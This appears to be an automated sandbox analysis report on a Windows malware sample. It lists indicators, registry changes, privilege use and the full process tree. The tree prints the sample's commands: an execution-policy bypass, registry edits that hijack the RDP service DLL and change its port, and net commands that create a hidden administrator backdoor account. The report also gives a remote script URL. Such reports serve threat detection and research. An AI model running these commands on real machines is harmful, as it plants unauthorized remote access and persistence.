Analysis
-
max time kernel
69s -
max time network
74s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24-09-2021 18:54
Static task
static1
Behavioral task
behavioral1
Sample
5367615a3d3f95eeab592a53716ed3bb.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
5367615a3d3f95eeab592a53716ed3bb.exe
Resource
win10v20210408
General
-
Target
5367615a3d3f95eeab592a53716ed3bb.exe
-
Size
5.7MB
-
MD5
5367615a3d3f95eeab592a53716ed3bb
-
SHA1
8592c6e78aa592d9f135dbe9d97cf2f524dbeaed
-
SHA256
af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0
-
SHA512
383fada6525e8ced7cc40c14d6cb6718583da6dca4f7db2654c15c0842a692d2011364da6f53690f005ed33f90606e81836eefeb8df04de655904fa5776b8790
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 7 1632 powershell.exe 9 1632 powershell.exe 10 1632 powershell.exe 11 1632 powershell.exe 13 1632 powershell.exe 15 1632 powershell.exe 17 1632 powershell.exe 19 1632 powershell.exe 21 1632 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3348 3348 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zheoogak.tjh.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7BA.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BC.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI76A.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_c3uacqs4.oep.ps1 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI72B.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7AA.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1092 powershell.exe 1092 powershell.exe 1092 powershell.exe 3604 powershell.exe 3604 powershell.exe 3604 powershell.exe 3976 powershell.exe 3976 powershell.exe 3976 powershell.exe 2808 powershell.exe 2808 powershell.exe 2808 powershell.exe 1092 powershell.exe 1092 powershell.exe 1092 powershell.exe 1632 powershell.exe 1632 powershell.exe 1632 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 604 604 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 3604 powershell.exe Token: SeIncreaseQuotaPrivilege 3604 powershell.exe Token: SeSecurityPrivilege 3604 powershell.exe Token: SeTakeOwnershipPrivilege 3604 powershell.exe Token: SeLoadDriverPrivilege 3604 powershell.exe Token: SeSystemProfilePrivilege 3604 powershell.exe Token: SeSystemtimePrivilege 3604 powershell.exe Token: SeProfSingleProcessPrivilege 3604 powershell.exe Token: SeIncBasePriorityPrivilege 3604 powershell.exe Token: SeCreatePagefilePrivilege 3604 powershell.exe Token: SeBackupPrivilege 3604 powershell.exe Token: SeRestorePrivilege 3604 powershell.exe Token: SeShutdownPrivilege 3604 powershell.exe Token: SeDebugPrivilege 3604 powershell.exe Token: SeSystemEnvironmentPrivilege 3604 powershell.exe Token: SeRemoteShutdownPrivilege 3604 powershell.exe Token: SeUndockPrivilege 3604 powershell.exe Token: SeManageVolumePrivilege 3604 powershell.exe Token: 33 3604 powershell.exe Token: 34 3604 powershell.exe Token: 35 3604 powershell.exe Token: 36 3604 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeIncreaseQuotaPrivilege 3976 powershell.exe Token: SeSecurityPrivilege 3976 powershell.exe Token: SeTakeOwnershipPrivilege 3976 powershell.exe Token: SeLoadDriverPrivilege 3976 powershell.exe Token: SeSystemProfilePrivilege 3976 powershell.exe Token: SeSystemtimePrivilege 3976 powershell.exe Token: SeProfSingleProcessPrivilege 3976 powershell.exe Token: SeIncBasePriorityPrivilege 3976 powershell.exe Token: SeCreatePagefilePrivilege 3976 powershell.exe Token: SeBackupPrivilege 3976 powershell.exe Token: SeRestorePrivilege 3976 powershell.exe Token: SeShutdownPrivilege 3976 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeSystemEnvironmentPrivilege 3976 powershell.exe Token: SeRemoteShutdownPrivilege 3976 powershell.exe Token: SeUndockPrivilege 3976 powershell.exe Token: SeManageVolumePrivilege 3976 powershell.exe Token: 33 3976 powershell.exe Token: 34 3976 powershell.exe Token: 35 3976 powershell.exe Token: 36 3976 powershell.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeIncreaseQuotaPrivilege 2808 powershell.exe Token: SeSecurityPrivilege 2808 powershell.exe Token: SeTakeOwnershipPrivilege 2808 powershell.exe Token: SeLoadDriverPrivilege 2808 powershell.exe Token: SeSystemProfilePrivilege 2808 powershell.exe Token: SeSystemtimePrivilege 2808 powershell.exe Token: SeProfSingleProcessPrivilege 2808 powershell.exe Token: SeIncBasePriorityPrivilege 2808 powershell.exe Token: SeCreatePagefilePrivilege 2808 powershell.exe Token: SeBackupPrivilege 2808 powershell.exe Token: SeRestorePrivilege 2808 powershell.exe Token: SeShutdownPrivilege 2808 powershell.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeSystemEnvironmentPrivilege 2808 powershell.exe Token: SeRemoteShutdownPrivilege 2808 powershell.exe Token: SeUndockPrivilege 2808 powershell.exe Token: SeManageVolumePrivilege 2808 powershell.exe Token: 33 2808 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5367615a3d3f95eeab592a53716ed3bb.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 628 wrote to memory of 1092 628 5367615a3d3f95eeab592a53716ed3bb.exe powershell.exe PID 628 wrote to memory of 1092 628 5367615a3d3f95eeab592a53716ed3bb.exe powershell.exe PID 1092 wrote to memory of 2056 1092 powershell.exe csc.exe PID 1092 wrote to memory of 2056 1092 powershell.exe csc.exe PID 2056 wrote to memory of 2452 2056 csc.exe cvtres.exe PID 2056 wrote to memory of 2452 2056 csc.exe cvtres.exe PID 1092 wrote to memory of 3604 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 3604 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 3976 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 3976 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 2808 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 2808 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 2736 1092 powershell.exe reg.exe PID 1092 wrote to memory of 2736 1092 powershell.exe reg.exe PID 1092 wrote to memory of 3812 1092 powershell.exe reg.exe PID 1092 wrote to memory of 3812 1092 powershell.exe reg.exe PID 1092 wrote to memory of 976 1092 powershell.exe reg.exe PID 1092 wrote to memory of 976 1092 powershell.exe reg.exe PID 1092 wrote to memory of 3556 1092 powershell.exe net.exe PID 1092 wrote to memory of 3556 1092 powershell.exe net.exe PID 3556 wrote to memory of 3968 3556 net.exe net1.exe PID 3556 wrote to memory of 3968 3556 net.exe net1.exe PID 1092 wrote to memory of 1840 1092 powershell.exe cmd.exe PID 1092 wrote to memory of 1840 1092 powershell.exe cmd.exe PID 1840 wrote to memory of 1424 1840 cmd.exe cmd.exe PID 1840 wrote to memory of 1424 1840 cmd.exe cmd.exe PID 1424 wrote to memory of 4032 1424 cmd.exe net.exe PID 1424 wrote to memory of 4032 1424 cmd.exe net.exe PID 4032 wrote to memory of 3984 4032 net.exe net1.exe PID 4032 wrote to memory of 3984 4032 net.exe net1.exe PID 1092 wrote to memory of 3784 1092 powershell.exe cmd.exe PID 1092 wrote to memory of 3784 1092 powershell.exe cmd.exe PID 3784 wrote to memory of 2176 3784 cmd.exe cmd.exe PID 3784 wrote to memory of 2176 3784 cmd.exe cmd.exe PID 2176 wrote to memory of 2808 2176 cmd.exe net.exe PID 2176 wrote to memory of 2808 2176 cmd.exe net.exe PID 2808 wrote to memory of 2196 2808 net.exe net1.exe PID 2808 wrote to memory of 2196 2808 net.exe net1.exe PID 3812 wrote to memory of 568 3812 cmd.exe net.exe PID 3812 wrote to memory of 568 3812 cmd.exe net.exe PID 568 wrote to memory of 740 568 net.exe net1.exe PID 568 wrote to memory of 740 568 net.exe net1.exe PID 3668 wrote to memory of 3500 3668 cmd.exe net.exe PID 3668 wrote to memory of 3500 3668 cmd.exe net.exe PID 3500 wrote to memory of 400 3500 net.exe net1.exe PID 3500 wrote to memory of 400 3500 net.exe net1.exe PID 976 wrote to memory of 3556 976 cmd.exe net.exe PID 976 wrote to memory of 3556 976 cmd.exe net.exe PID 3556 wrote to memory of 3764 3556 net.exe net1.exe PID 3556 wrote to memory of 3764 3556 net.exe net1.exe PID 3604 wrote to memory of 876 3604 cmd.exe net.exe PID 3604 wrote to memory of 876 3604 cmd.exe net.exe PID 876 wrote to memory of 2676 876 net.exe net1.exe PID 876 wrote to memory of 2676 876 net.exe net1.exe PID 3444 wrote to memory of 2980 3444 cmd.exe net.exe PID 3444 wrote to memory of 2980 3444 cmd.exe net.exe PID 2980 wrote to memory of 2756 2980 net.exe net1.exe PID 2980 wrote to memory of 2756 2980 net.exe net1.exe PID 3480 wrote to memory of 400 3480 cmd.exe net.exe PID 3480 wrote to memory of 400 3480 cmd.exe net.exe PID 400 wrote to memory of 4052 400 net.exe net1.exe PID 400 wrote to memory of 4052 400 net.exe net1.exe PID 4044 wrote to memory of 3912 4044 cmd.exe WMIC.exe PID 4044 wrote to memory of 3912 4044 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA841.tmp" "c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\CSC37CB2EB3121A4206B5E6BEA37C38AEFE.TMP"4⤵PID:2452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2736
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3812 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:976
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3968
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3984
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2196
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2840
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:980
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:740
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc FWXHxFTu /add1⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\net.exenet.exe user wgautilacc FWXHxFTu /add2⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc FWXHxFTu /add3⤵PID:400
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:3764
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:2676
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:2756
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc FWXHxFTu1⤵
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\system32\net.exenet.exe user wgautilacc FWXHxFTu2⤵
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc FWXHxFTu3⤵PID:4052
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:3912
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:876
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3604
-
